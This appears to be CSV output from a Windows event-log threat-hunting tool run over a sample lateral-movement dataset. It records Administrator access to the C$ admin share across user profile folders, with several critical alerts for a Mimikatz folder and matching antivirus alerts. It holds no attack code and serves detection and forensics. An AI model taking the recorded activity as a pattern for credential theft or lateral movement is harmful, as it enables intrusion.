2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
